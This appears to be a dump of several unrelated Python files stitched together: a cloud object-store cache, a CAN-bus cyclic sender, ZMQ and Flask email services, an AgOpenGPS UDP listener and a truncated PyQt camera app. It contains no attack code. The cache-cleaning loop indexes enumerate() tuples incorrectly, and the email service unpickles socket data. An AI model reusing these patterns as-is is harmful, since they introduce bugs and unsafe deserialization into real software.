cleaning once within 10% of the defined cache size? cache_limit = self.cache_size * 0.9 if total_size > cache_limit: log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s", convert_bytes(total_size), convert_bytes(cache_limit)) # How much to delete? If simply deleting up to the cache-10% limit, # is likely to be deleting frequently and may run the risk of hitting # the limit - maybe delete additional #%? # For now, delete enough to leave at least 10% of the total cache free delete_this_much = total_size - cache_limit self.__clean_cache(file_list, delete_this_much) self.sleeper.sleep(30) # Test cache size every 30 seconds? def __clean_cache(self, file_list, delete_this_much): """ Keep deleting files from the file_list until the size of the deleted files is greater than the value in delete_this_much parameter. :type file_list: list :param file_list: List of candidate files that can be deleted. This method will start deleting files from the beginning of the list so the list should be sorted accordingly. 
The list must contains 3-element tuples, positioned as follows: position 0 holds file last accessed timestamp (as time.struct_time), position 1 holds file path, and position 2 has file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394) :type delete_this_much: int :param delete_this_much: Total size of files, in bytes, that should be deleted. """ # Keep deleting datasets from file_list until deleted_amount does not # exceed delete_this_much; start deleting from the front of the file list, # which assumes the oldest files come first on the list. deleted_amount = 0 for entry in enumerate(file_list): if deleted_amount < delete_this_much: deleted_amount += entry[2] os.remove(entry[1]) # Debugging code for printing deleted files' stats # folder, file_name = os.path.split(f[1]) # file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0]) # log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \ # % (i, file_name, convert_bytes(f[2]), file_date, \ # convert_bytes(deleted_amount), convert_bytes(delete_this_much))) else: log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount)) return def _get_bucket(self, bucket_name): try: bucket = self.conn.storage.buckets.get(bucket_name) if bucket is None: log.debug("Bucket not found, creating a bucket with handle '%s'", bucket_name) bucket = self.conn.storage.buckets.create(bucket_name) log.debug("Using cloud ObjectStore with bucket '%s'", bucket.name) return bucket except InvalidNameException: log.exception("Invalid bucket name -- unable to continue") raise except Exception: # These two generic exceptions will be replaced by specific exceptions # once proper exceptions are exposed by CloudBridge. log.exception("Could not get bucket '{}'".format(bucket_name)) raise Exception def _fix_permissions(self, rel_path): """ Set permissions on rel_path""" for basedir, _, files in os.walk(rel_path): umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid) for filename in files: path = os.path.join(basedir, filename) # Ignore symlinks if os.path.islink(path): continue umask_fix_perms(path, self.config.umask, 0o666, self.config.gid) def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs): # extra_dir should never be constructed from provided data but just # make sure there are no shenannigans afoot if extra_dir and extra_dir != os.path.normpath(extra_dir): log.warning('extra_dir is not normalized: %s', extra_dir) raise ObjectInvalid("The requested object is invalid") # ensure that any parent directory references in alt_name would not # result in a path not contained in the directory path constructed here if alt_name: if not safe_relpath(alt_name): log.warning('alt_name would locate path outside dir: %s', alt_name) raise ObjectInvalid("The requested object is invalid") # alt_name can contain parent directory references, but S3 will not # follow them, so if they are valid we normalize them out alt_name = os.path.normpath(alt_name) rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # for JOB_WORK directory if obj_dir: rel_path = os.path.join(rel_path, str(self._get_object_id(obj))) if base_dir: base = self.extra_dirs.get(base_dir) return os.path.join(base, rel_path) # S3 folders are marked by having trailing '/' so add it now rel_path = '%s/' % rel_path if not dir_only: rel_path = 
os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % self._get_object_id(obj)) return rel_path def _get_cache_path(self, rel_path): return os.path.abspath(os.path.join(self.staging_path, rel_path)) def _get_transfer_progress(self): return self.transfer_progress def _get_size_in_cloud(self, rel_path): try: obj = self.bucket.objects.get(rel_path) if obj: return obj.size except Exception: log.exception("Could not get size of key '%s' from S3", rel_path) return -1 def _key_exists(self, rel_path): exists = False try: # A hackish way of testing if the rel_path is a folder vs a file is_dir = rel_path[-1] == '/' if is_dir: keyresult = self.bucket.objects.list(prefix=rel_path) if len(keyresult) > 0: exists = True else: exists = False else: exists = True if self.bucket.objects.get(rel_path) is not None else False except Exception: log.exception("Trouble checking existence of S3 key '%s'", rel_path) return False if rel_path[0] == '/': raise return exists def _in_cache(self, rel_path): """ Check if the given dataset is in the local cache and return True if so. """ # log.debug("------ Checking cache for rel_path %s" % rel_path) cache_path = self._get_cache_path(rel_path) return os.path.exists(cache_path) def _pull_into_cache(self, rel_path): # Ensure the cache directory structure exists (e.g., dataset_#_files/) rel_path_dir = os.path.dirname(rel_path) if not os.path.exists(self._get_cache_path(rel_path_dir)): os.makedirs(self._get_cache_path(rel_path_dir)) # Now pull in the file file_ok = self._download(rel_path) self._fix_permissions(self._get_cache_path(rel_path_dir)) return file_ok def _transfer_cb(self, complete, total): self.transfer_progress += 10 def _download(self, rel_path): try: log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) key = self.bucket.objects.get(rel_path) # Test if cache is large enough to hold the new file if self.cache_size > 0 and key.size > self.cache_size: log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.", rel_path, key.size, self.cache_size) return False if self.use_axel: log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) ncores = multiprocessing.cpu_count() url = key.generate_url(7200) ret_code = subprocess.call("axel -a -n {} '{}'".format(ncores, url)) if ret_code == 0: return True else: log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path)) self.transfer_progress = 0 # Reset transfer progress counter with open(self._get_cache_path(rel_path), "w+") as downloaded_file_handle: key.save_content(downloaded_file_handle) return True except Exception: log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name) return False def _push_to_os(self, rel_path, source_file=None, from_string=None): """ Push the file pointed to by ``rel_path`` to the object store naming the key ``rel_path``. If ``source_file`` is provided, push that file instead while still using ``rel_path`` as the key name. If ``from_string`` is provided, set contents of the file to the value of the string. 
""" try: source_file = source_file if source_file else self._get_cache_path(rel_path) if os.path.exists(source_file): if os.path.getsize(source_file) == 0 and (self.bucket.objects.get(rel_path) is not None): log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path) return True if from_string: if not self.bucket.objects.get(rel_path): created_obj = self.bucket.objects.create(rel_path) created_obj.upload(source_file) else: self.bucket.objects.get(rel_path).upload(source_file) log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path) else: start_time = datetime.now() log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path) self.transfer_progress = 0 # Reset transfer progress counter if not self.bucket.objects.get(rel_path): created_obj = self.bucket.objects.create(rel_path) created_obj.upload_from_file(source_file) else: self.bucket.objects.get(rel_path).upload_from_file(source_file) end_time = datetime.now() log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)", source_file, rel_path, os.path.getsize(source_file), end_time - start_time) return True else: log.error("Tried updating key '%s' from source file '%s', but source file does not exist.", rel_path, source_file) except Exception: log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file) return False def file_ready(self, obj, **kwargs): """ A helper method that checks if a file corresponding to a dataset is ready and available to be used. Return ``True`` if so, ``False`` otherwise. """ rel_path = self._construct_path(obj, **kwargs) # Make sure the size in cache is available in its entirety if self._in_cache(rel_path): if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_cloud(rel_path): return True log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path, os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_cloud(rel_path)) return False def _exists(self, obj, **kwargs): in_cache = False rel_path = self._construct_path(obj, **kwargs) # Check cache if self._in_cache(rel_path): in_cache = True # Check cloud in_cloud = self._key_exists(rel_path) # log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3)) # dir_only does not get synced so shortcut the decision dir_only = kwargs.get('dir_only', False) base_dir = kwargs.get('base_dir', None) if dir_only: if in_cache or in_cloud: return True # for JOB_WORK directory elif base_dir: if not os.path.exists(rel_path): os.makedirs(rel_path) return True else: return False # TODO: Sync should probably not be done here. Add this to an async upload stack? 
if in_cache and not in_cloud: self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path)) return True elif in_cloud: return True else: return False def _create(self, obj, **kwargs): if not self._exists(obj, **kwargs): # Pull out locally used fields extra_dir = kwargs.get('extra_dir', None) extra_dir_at_root = kwargs.get('extra_dir_at_root', False) dir_only = kwargs.get('dir_only', False) alt_name = kwargs.get('alt_name', None) # Construct hashed path rel_path = os.path.join(*directory_hash_id(self._get_object_id(obj))) # Optionally append extra_dir if extra_dir is not None: if extra_dir_at_root: rel_path = os.path.join(extra_dir, rel_path) else: rel_path = os.path.join(rel_path, extra_dir) # Create given directory in cache cache_dir = os.path.join(self.staging_path, rel_path) if not os.path.exists(cache_dir): os.makedirs(cache_dir) if not dir_only: rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % self._get_object_id(obj)) open(os.path.join(self.staging_path, rel_path), 'w').close() self._push_to_os(rel_path, from_string='') def _empty(self, obj, **kwargs): if self._exists(obj, **kwargs): return bool(self._size(obj, **kwargs) > 0) else: raise ObjectNotFound('objectstore.empty, object does not exist: %s, kwargs: %s' % (str(obj), str(kwargs))) def _size(self, obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) if self._in_cache(rel_path): try: return os.path.getsize(self._get_cache_path(rel_path)) except OSError as ex: log.info("Could not get size of file '%s' in local cache, will try cloud. Error: %s", rel_path, ex) elif self._exists(obj, **kwargs): return self._get_size_in_cloud(rel_path) log.warning("Did not find dataset '%s', returning 0 for size", rel_path) return 0 def _delete(self, obj, entire_dir=False, **kwargs): rel_path = self._construct_path(obj, **kwargs) extra_dir = kwargs.get('extra_dir', None) base_dir = kwargs.get('base_dir', None) dir_only = kwargs.get('dir_only', False) obj_dir = kwargs.get('obj_dir', False) try: # Remove temparory data in JOB_WORK directory if base_dir and dir_only and obj_dir: shutil.rmtree(os.path.abspath(rel_path)) return True # For the case of extra_files, because we don't have a reference to # individual files/keys we need to remove the entire directory structure # with all the files in it. This is easy for the local file system, # but requires iterating through each individual key in S3 and deleing it. 
if entire_dir and extra_dir: shutil.rmtree(self._get_cache_path(rel_path)) results = self.bucket.objects.list(prefix=rel_path) for key in results: log.debug("Deleting key %s", key.name) key.delete() return True else: # Delete from cache first os.unlink(self._get_cache_path(rel_path)) # Delete from S3 as well if self._key_exists(rel_path): key = self.bucket.objects.get(rel_path) log.debug("Deleting key %s", key.name) key.delete() return True except Exception: log.exception("Could not delete key '%s' from cloud", rel_path) except OSError: log.exception('%s delete error', self._get_filename(obj, **kwargs)) return False def _get_data(self, obj, start=0, count=-1, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Check cache first and get file if not there if not self._in_cache(rel_path): self._pull_into_cache(rel_path) # Read the file content from cache data_file = open(self._get_cache_path(rel_path)) data_file.seek(start) content = data_file.read(count) data_file.close() return content def _get_filename(self, obj, **kwargs): base_dir = kwargs.get('base_dir', None) dir_only = kwargs.get('dir_only', False) obj_dir = kwargs.get('obj_dir', False) rel_path = self._construct_path(obj, **kwargs) # for JOB_WORK directory if base_dir and dir_only and obj_dir: return os.path.abspath(rel_path) cache_path = self._get_cache_path(rel_path) # S3 does not recognize directories as files so cannot check if those exist. # So, if checking dir only, ensure given dir exists in cache and return # the expected cache path. # dir_only = kwargs.get('dir_only', False) # if dir_only: # if not os.path.exists(cache_path): # os.makedirs(cache_path) # return cache_path # Check if the file exists in the cache first if self._in_cache(rel_path): return cache_path # Check if the file exists in persistent storage and, if it does, pull it into cache elif self._exists(obj, **kwargs): if dir_only: # Directories do not get pulled into cache return cache_path else: if self._pull_into_cache(rel_path): return cache_path # For the case of retrieving a directory only, return the expected path # even if it does not exist. # if dir_only: # return cache_path raise ObjectNotFound('objectstore.get_filename, no cache_path: %s, kwargs: %s' % (str(obj), str(kwargs))) # return cache_path # Until the upload tool does not explicitly create the dataset, return expected path def _update_from_file(self, obj, file_name=None, create=False, **kwargs): if create: self._create(obj, **kwargs) if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) # Chose whether to use the dataset file itself or an alternate file if file_name: source_file = os.path.abspath(file_name) # Copy into cache cache_file = self._get_cache_path(rel_path) try: if source_file != cache_file: # FIXME? Should this be a `move`? 
shutil.copy2(source_file, cache_file) self._fix_permissions(cache_file) except OSError: log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file) else: source_file = self._get_cache_path(rel_path) # Update the file on cloud self._push_to_os(rel_path, source_file) else: raise ObjectNotFound('objectstore.update_from_file, object does not exist: %s, kwargs: %s' % (str(obj), str(kwargs))) def _get_object_url(self, obj, **kwargs): if self._exists(obj, **kwargs): rel_path = self._construct_path(obj, **kwargs) try: key = self.bucket.objects.get(rel_path) return key.generate_url(expires_in=86400) # 24hrs except Exception: log.exception("Trouble generating URL for dataset '%s'", rel_path) return None def _get_store_usage_percent(self): return 0.0
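# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the object store class above: the cache
# eviction pattern its cleaning docstring describes, reduced to a standalone
# helper. Files are collected as (atime, path, size) tuples, sorted
# oldest-first, and removed until `delete_this_much` bytes have been freed.
# The helper name is hypothetical.
# ---------------------------------------------------------------------------
def _example_evict_oldest(cache_root, delete_this_much):
    file_list = []
    for basedir, _, files in os.walk(cache_root):
        for name in files:
            path = os.path.join(basedir, name)
            stat = os.stat(path)
            file_list.append((stat.st_atime, path, stat.st_size))
    file_list.sort()  # oldest access time first
    deleted_amount = 0
    for _, path, size in file_list:
        if deleted_amount >= delete_this_much:
            break
        os.remove(path)
        deleted_amount += size
    return deleted_amount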
broadcastmanager.py
# coding: utf-8 """ Exposes several methods for transmitting cyclic messages. The main entry point to these classes should be through :meth:`can.BusABC.send_periodic`. """ import abc import logging import threading import time import warnings log = logging.getLogger('can.bcm') class CyclicTask(object): """ Abstract Base for all cyclic tasks. """ @abc.abstractmethod def stop(self): """Cancel this periodic task. :raises can.CanError: If stop is called on an already stopped task. """ class CyclicSendTaskABC(CyclicTask): """ Message send task with defined period """ def __init__(self, message, period): """ :param can.Message message: The message to be sent periodically. :param float period: The rate in seconds at which to send the message. """ self.message = message self.can_id = message.arbitration_id self.arbitration_id = message.arbitration_id self.period = period super(CyclicSendTaskABC, self).__init__() class LimitedDurationCyclicSendTaskABC(CyclicSendTaskABC): def __init__(self, message, period, duration): """Message send task with a defined duration and period. :param can.Message message: The message to be sent periodically. :param float period: The rate in seconds at which to send the message. :param float duration: The duration to keep sending this message at given rate. """ super(LimitedDurationCyclicSendTaskABC, self).__init__(message, period) self.duration = duration class RestartableCyclicTaskABC(CyclicSendTaskABC): """Adds support for restarting a stopped cyclic task""" @abc.abstractmethod def start(self): """Restart a stopped periodic task. """ class ModifiableCyclicTaskABC(CyclicSendTaskABC): """Adds support for modifying a periodic message""" def modify_data(self, message): """Update the contents of this periodically sent message without altering the timing. :param can.Message message: The message with the new :attr:`can.Message.data`. Note: The arbitration ID cannot be changed. """ self.message = message class MultiRateCyclicSendTaskABC(CyclicSendTaskABC): """A Cyclic send task that supports switches send frequency after a set time. """ def __init__(self, channel, message, count, initial_period, subsequent_period): """ Transmits a message `count` times at `initial_period` then continues to transmit message at `subsequent_period`. :param channel: See interface specific documentation. 
:param can.Message message: :param int count: :param float initial_period: :param float subsequent_period: """ super(MultiRateCyclicSendTaskABC, self).__init__(channel, message, subsequent_period) class ThreadBasedCyclicSendTask(ModifiableCyclicTaskABC, LimitedDurationCyclicSendTaskABC, RestartableCyclicTaskABC): """Fallback cyclic send task using thread.""" def __init__(self, bus, lock, message, period, duration=None): super(ThreadBasedCyclicSendTask, self).__init__(message, period, duration) self.bus = bus self.lock = lock self.stopped = True self.thread = None self.end_time = time.time() + duration if duration else None self.start() def stop(self): self.stopped = True def start(self): self.stopped = False if self.thread is None or not self.thread.is_alive(): name = "Cyclic send task for 0x%X" % (self.message.arbitration_id) self.thread = threading.Thread(target=self._run, name=name) self.thread.daemon = True self.thread.start() def _run(self): while not self.stopped: # Prevent calling bus.send from multiple threads with self.lock: started = time.time() try: self.bus.send(self.message) except Exception as exc: log.exception(exc) break if self.end_time is not None and time.time() >= self.end_time: break # Compensate for the time it takes to send the message delay = self.period - (time.time() - started) time.sleep(max(0.0, delay)) def send_periodic(bus, message, period, *args, **kwargs): """ Send a :class:`~can.Message` every `period` seconds on the given bus. :param can.BusABC bus: A CAN bus which supports sending. :param can.Message message: Message to send periodically. :param float period: The minimum time between sending messages. :return: A started task instance """ warnings.warn("The function `can.send_periodic` is deprecated and will " + "be removed in an upcoming version. Please use `can.Bus.send_periodic` instead.", DeprecationWarning) return bus.send_periodic(message, period, *args, **kwargs)
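# ---------------------------------------------------------------------------
# Illustrative sketch, not part of python-can: exercising
# ThreadBasedCyclicSendTask with stand-in bus and message objects. In real
# code the entry point is can.BusABC.send_periodic, as the module docstring
# notes; the stub classes below exist only to make the example self-contained.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    class _StubMessage(object):
        def __init__(self, arbitration_id, data):
            self.arbitration_id = arbitration_id
            self.data = data

    class _StubBus(object):
        def send(self, msg):
            print("send 0x%X %r" % (msg.arbitration_id, msg.data))

    # Send every 0.5 s for roughly 2 s, then stop explicitly.
    task = ThreadBasedCyclicSendTask(_StubBus(), threading.Lock(),
                                     _StubMessage(0x123, b'\x01\x02'),
                                     period=0.5, duration=2.0)
    time.sleep(2.5)
    task.stop()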
emails.py
# # MySlice version 2 # # Activity process service: manages emails # # (c) 2016 Ciro Scognamiglio <ciro.scognamiglio@lip6.fr> ## import signal import threading from queue import Queue import rethinkdb as r from myslice.db import connect, changes, events from myslice.db.activity import Event from myslice.services.workers.emails import emails_run as manageEmails, confirmEmails import myslice.lib.log as logging import zmq import pickle logger = logging.getLogger("emails") def receive_signal(signum, stack): logger.info('Received signal %s', signum) raise SystemExit('Exiting') def run(): """ """ signal.signal(signal.SIGINT, receive_signal) signal.signal(signal.SIGTERM, receive_signal) signal.signal(signal.SIGHUP, receive_signal) threads = [] qEmails = Queue() for y in range(1): t = threading.Thread(target=manageEmails, args=(qEmails,)) t.daemon = True threads.append(t) t.start() qConfirmEmails = Queue() for y in range(1): t = threading.Thread(target=confirmEmails, args=(qConfirmEmails,)) t.daemon = True threads.append(t) t.start() context = zmq.Context() socket = context.socket(zmq.SUB) socket.setsockopt_string(zmq.SUBSCRIBE, 'emails') socket.connect("tcp://localhost:6002") logger.info("[emails] Collecting updates from ZMQ bus for activity") while True: logger.debug("[emails]Change in emails feed") topic, zmqmessage = socket.recv_multipart() activity = pickle.loads(zmqmessage) logger.debug("[emails]{0}: {1}".format(topic, activity)) try: event = Event(activity['new_val']) except Exception as e: logger.error("Problem with event: {}".format(e)) continue else: if event.isConfirm() and event.notify: logger.debug("Add event %s to Confirm Email queue" % (event.id)) qConfirmEmails.put(event) elif event.isPending() and event.notify: logger.debug("Add event %s to Email queue" % (event.id)) qEmails.put(event) elif event.isDenied() and event.notify: logger.info("event {} is denied".format(event.id)) logger.debug("Add event %s to Email queue" % (event.id)) qEmails.put(event) elif event.isSuccess() and event.notify: logger.debug("Add event %s to Email queue" % (event.id)) qEmails.put(event) logger.critical("Service emails stopped") # waits for the thread to finish for x in threads: x.join()
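# ---------------------------------------------------------------------------
# Illustrative counterpart, not part of this service: a minimal ZMQ publisher
# that emits the kind of multipart message the SUB socket above consumes --
# a topic frame b'emails' plus a pickled activity dict carrying a 'new_val'
# entry. The exact fields Event() expects are defined elsewhere, so the
# payload below is only a placeholder.
# ---------------------------------------------------------------------------
def publish_example_activity():
    ctx = zmq.Context()
    pub = ctx.socket(zmq.PUB)
    pub.bind("tcp://*:6002")  # the service connects to localhost:6002
    activity = {'new_val': {'id': 'example-id', 'status': 'PENDING'}}
    pub.send_multipart([b'emails', pickle.dumps(activity)])
    pub.close()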
emails.py
# -*- coding: utf-8 -*- """ """ from threading import Thread from flask import url_for, current_app from flask_mail import Message from myblog.extensions import mail def _send_async_mail(app, message): with app.app_context(): mail.send(message) def send_mail(subject, to, html): app = current_app._get_current_object() message = Message(subject, recipients=[to], html=html) thr = Thread(target=_send_async_mail, args=[app, message]) thr.start() return thr def send_new_comment_email(post): post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments' send_mail(subject='New comment', to=current_app.config['MYBLOG_EMAIL'], html='<p>New comment in post <i>%s</i>, click the link below to check:</p>' '<p><a href="%s">%s</a></P>' '<p><small style="color: #868e96">Do not reply this email.</small></p>' % (post.title, post_url, post_url)) def send_new_reply_email(comment): post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments' send_mail(subject='New reply', to=comment.email, html='<p>New reply for the comment you left in post <i>%s</i>, click the link below to check: </p>' '<p><a href="%s">%s</a></p>' '<p><small style="color: #868e96">Do not reply this email.</small></p>' % (comment.post.title, post_url, post_url))
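# ---------------------------------------------------------------------------
# Illustrative sketch, not part of this module: send_mail() relies on
# current_app, so it must run inside an application context. The factory name
# (create_app) and the recipient address are assumptions for the example,
# which is therefore left commented out.
# ---------------------------------------------------------------------------
# from myblog import create_app
#
# app = create_app()
# with app.app_context():
#     thr = send_mail(subject='Hello',
#                     to='reader@example.com',
#                     html='<p>Test message</p>')
#     thr.join()  # optionally wait for the background send to finish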
connector.py
import socket import threading import time import json import pkg_resources import logging class AgoPgn: """ PGN message from AGOpenGPS: PGN message has a always a HeaderHi and a HeaderLo which are the first two bytes of the message. Then a variable data part follows """ def __init__(self, header_low: int, header_hi: int = 127, data_def: list = None): # Instance attributes self.h_hi: int = header_hi self.h_low: int = header_low self.pgn_number: int = 0 self.descr: str = "Description" self.header: tuple = (self.h_hi, self.h_low) self.data_def: list = data_def self.data: dict = {} def __repr__(self): return str(self.data) def get_pgndef_file(): path = 'pgn_definition.json' # always use slash return pkg_resources.resource_filename(__name__, path) class AgoUdpServer: """ UDP Server which receives data from AGOpenGPS via UDP """ def __init__(self, ip: str = "", port: int = 8888): """ Initalize server """ # Instance attributes self.thread: threading.Thread = None self.ip_address: str = ip self.port: int = port self.serverSock: socket = None self.pgndef: list = [] # storage for PGN definitions (JSON) self.pgndata: dict = {} # storage for data read per PGN (AgoPgn objects) # get IP address of host if not given if ip == "": ip = socket.gethostbyname(socket.gethostname()) self.ip_address = ip # load PGN data definition self.load_pgndef() def load_pgndef(self): """ Load PGN definition """ with open(get_pgndef_file(), "r") as f: self.pgndef = json.load(f) # prepare a PGN object for each definition in the list for d in self.pgndef: pgn = AgoPgn(header_low=d["Header_Lo"], header_hi=d["Header_Hi"], data_def=d["Data"]) pgn.pgn_number = d["PGN"] pgn.descr = d["Description"] self.pgndata[pgn.header] = pgn # add PGN to data dict with header tuple as key def run(self): """ Startup and run server""" # start Server self.serverSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.serverSock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.serverSock.bind((self.ip_address, self.port)) logging.info("Server startet: " + self.ip_address + ":" + str(self.port)) while True: data = self.serverSock.recvfrom(1024) # print(f"Message received: ${str(data)}") try: # get message part bdata: bytes = data[0] # get first 2 bytes which should contain the header, as int hd_hi = int(bdata[0]) hd_lo = int(bdata[1]) # construct the tuple / key for the definition hd = (hd_hi, hd_lo) # get definition try: pgn = self.pgndata[hd] # definition found, we want the data datapart = bdata[2:] AgoUdpServer.parse_data(pgn=pgn, data=datapart) except KeyError: # Nothing found for his PGN message key, we are not interested in this message pass except BaseException as ex: logging.exception(f"Exception while receiving message ${str(data)}", ex) raise ex def get_unique_param_value(self, param_id: str): """ Get parameter value via ID; assumes the ID is unique (otherwise returns first value)""" for pgn in self.pgndata.values(): # loop pgns for cur_par_id in pgn.data: # loop parameters if cur_par_id == param_id: return pgn.data[cur_par_id] def get_param_value(self, param_id: str, pgn_header: tuple): """ Get parameter value via ID & PGM message header""" pgn = self.pgndata[pgn_header] return pgn.data[param_id] @staticmethod def parse_data(pgn: AgoPgn, data: bytes): i = 0 data_def_len = len(pgn.data_def) for b in data: # get corresponding data def if not i < (data_def_len - 1): # more data than defined! 
pgnid = "Undefined" + str(i) pgn.data[pgnid] = b else: # definition available pgn_def = pgn.data_def[i] # set data based on type pgntype = pgn_def["Type"] if pgntype == "int": pgn.data[pgn_def["Id"]] = int(b) elif pgntype == "float": pgn.data[pgn_def["Id"]] = float(b) elif pgntype == "str": pgn.data[pgn_def["Id"]] = str(b) elif pgntype == "bool": pgn.data[pgn_def["Id"]] = bool(b) else: pgn.data[pgn_def["Id"]] = b i += 1 @staticmethod def start_server_thread(ip: str = "", port: int = 8888, name: str = "AgUDPServer"): """ Start UDP server as separate thread """ ago: AgoUdpServer = AgoUdpServer(ip, port) ago.thread = threading.Thread(name=name, target=ago.run, daemon=True) ago.thread.start() return ago def stop_server(self): """ Stop UDP server """ self.serverSock.close() if __name__ == "__main__": """ Start server """ a = AgoUdpServer.start_server_thread() while True: print("Current Data:") for d in a.pgndata.items(): print(d) time.sleep(1)
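# ---------------------------------------------------------------------------
# Illustrative test sender, not part of this module: the server above expects
# UDP datagrams whose first two bytes are Header_Hi and Header_Lo, followed by
# one byte per entry in the matching "Data" definition. The header values
# (127, 254) and the three data bytes below are placeholders -- real values
# come from pgn_definition.json.
# ---------------------------------------------------------------------------
def send_test_pgn(ip: str, port: int = 8888):
    payload = bytes([127, 254, 10, 20, 30])  # Header_Hi, Header_Lo, data...
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(payload, (ip, port))
    sock.close()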
interface.py
from PyQt5 import QtCore, QtGui, QtWidgets, uic import sys import cv2 import numpy as np import threading import time import queue import re from recordsave import Recorder from ssd_engine import SSD_Detector from motiondetector import MotionDetector from settings import EmailSender # Title WINDOW_TITLE = "DeepEye v1.1 2018" # Cam Params CAM_INDEX = 0 CAM_WIDTH = 1280 CAM_HEIGHT = 720 CAM_FPS = 30 # (record everything mode) This parameter determines the intervals of recording RECORD_INTERVAL = 120 # in seconds # (smart recording mode) This parameter determines how many more frames to save after inactivity RECORD_EXTENSION = 60 # in frame counts # Threading variables cam_running = False capture_thread = None q = queue.Queue() # load UI form_class = uic.loadUiType("interface.ui")[0] # parallel threaded camera feed def grab(cam, queue, width, height, fps): global cam_running cam_running = True capture = cv2.VideoCapture(cam) capture.set(cv2.CAP_PROP_FRAME_WIDTH, width) capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height) capture.set(cv2.CAP_PROP_FPS, fps) while(cam_running): frame = {} capture.grab() retval, img = capture.retrieve(0) frame["img"] = img if queue.qsize() < 10: queue.put(frame) else: print (queue.qsize()) print("Terminated camera feed") class MyWindowClass(QtWidgets.QMainWindow, form_class): def __init__(self, parent=None): QtWidgets.QMainWindow.__init__(self, parent) self.setupUi(self) self.setFixedSize(self.size()) # obtain dim of elements self.triggerGroupDim = [self.triggerGroup.geometry().width(),self.triggerGroup.geometry().height()] self.recordButtonDim = [self.recordButton.geometry().width(),self.recordButton.geometry().height()] self.filepathTextDim = [self.filepathText.geometry().width(),self.filepathText.geometry().height()] # Livefeed tab: self.window_width = self.live_display.frameSize().width() self.window_height = self.live_display.frameSize().height() self.live_display.setStyleSheet("QLabel { background-color : black}") self.timer = QtCore.QTimer(self) self.timer.timeout.connect(self.update_frame) self.timer.start(1) self.datetimeTagLocation = (10,30) self.datetimeTagColour = (0,255,0) # Recorder object self.record = Recorder(CAM_WIDTH, CAM_HEIGHT, CAM_FPS) self.recordButton.clicked.connect(self.record_to) self.timetracker = -1 self.subjectCheck.stateChanged.connect(self.record_on_detection) self.recordOnPresence = False self.inactiveCount = 0 self.isDetected = False self.motionCheck.stateChanged.connect(self.record_on_motion) self.recordOnMotion = False self.isMoving = False self.noMotionCount = 0 self.motionTagLocation = (CAM_WIDTH-300,30) self.motionTagColour = (0,0,255) # Detector object self.detector = SSD_Detector() if not self.detector.ready: self.subjectCheck.setEnabled(False) # Motion detector object self.motiondetect = MotionDetector() # email alert module self.emailsender = EmailSender() self.sendOnActivity = False self.sendoutStartTime = -1 self.emailsetupButton.clicked.connect(self.emailAlertSetup) self.testemailButton.clicked.connect(self.emailSendTest) self.sendemailCheck.stateChanged.connect(self.emailSendToggleFunc) self.password_input.setEchoMode(QtWidgets.QLineEdit.Password) self.port_input.setValidator(QtGui.QIntValidator(0,999)) if self.emailsender.getSetupFlag(): email_address, email_password, smtp, port = self.emailsender.getLoginDetails() self.email_input.setText(email_address) self.password_input.setText(email_password) self.smtp_input.setText(smtp) self.port_input.setText(str(port)) # Disable user interface self.emailGroup.setEnabled(False) 
self.testemailButton.setEnabled(True) self.sendemailCheck.setEnabled(True) self.emailsetupButton.setText("Change") def emailSendToggleFunc(self): if self.sendemailCheck.isChecked(): self.sendOnActivity = True else: self.sendOnActivity = False self.sendoutStartTime = -1 def emailSendTest(self): if self.emailsender.getSetupFlag(): self.emailsender.send_testmsg() def emailAlertSetup(self): if self.emailsetupButton.text() == "Setup": if not self.emailsender.getSetupFlag(): email_address = self.email_input.text() email_password = self.password_input.text() smtp = self.smtp_input.text() port = self.port_input.text() # simple check to evaluate input validity check_email_pattern = re.compile('[^@]+@[^@]+\.[^@]+') if not check_email_pattern.match(email_address): self.err_email_label.setText("Invalid Email") else: self.err_email_label.setText("") self.emailsender.login_setup(email_address,email_password,smtp,int(port)) if self.emailsender.getSetupFlag(): # If successfully logged in self.emailGroup.setEnabled(False) self.testemailButton.setEnabled(True) self.sendemailCheck.setEnabled(True) self.emailsetupButton.setText("Change") else: # authentication failed self.err_email_label.setText("Authentication Failed!") else: self.emailsender.close_connection() 